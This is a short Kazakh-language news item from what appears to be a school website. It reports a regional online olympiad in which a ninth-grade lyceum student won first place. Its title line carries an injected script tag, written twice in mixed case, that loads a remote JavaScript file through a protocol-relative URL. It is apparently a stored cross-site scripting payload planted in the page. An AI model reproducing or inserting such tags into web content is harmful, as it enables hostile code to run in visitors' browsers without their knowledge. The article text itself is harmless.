Жасөспірімдер олимпиадасы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

16.10.2020

Облыстық жасөспірімдер арасында онлайн режимінде олимпиада болып өтті. Жасөспірімдер олимпиадасының мақсаты оқушылардың жаратылыстану-математикалық бағыттағы пәндерге деген  қызығушылығын арттыру, оқушылардың шығармашылық қабілеттерін және ғылыми-зерттеу қызметіне қызығушылығын анықтау және дамыту, оқушылардың зияткерлік әлеуетін дамыту үшін жағдай жасау, оқушыларды жоғары деңгейдегі олимпиадаларға дайындау жүйесін жетілдіру және жаратылыстану-математикалық бағыттағы пәндер бойынша олимпиадаларға қатысушылардың резервін құру болып табылады. Жасөспірімдер олимпиадасының облыстық кезеңінің нәтижелері бойынша Балуан Шолақ атындағы мектеп-лицейдің 9 сынып оқушысы Исенева Аружан  жүлделі бірінші орынға ие болды. 28 қазан күні республикалық деңгейде болып өтетін олимпиадада  Аружан ауданымыздың намысын қорғайтын болады. Аружанды  жеңісімен құттықтап, республикалық кезеңінде сәттілік тілейміз.

Просмотров: 606


Пікір қосу



Деректерді қолтаңбаға қосу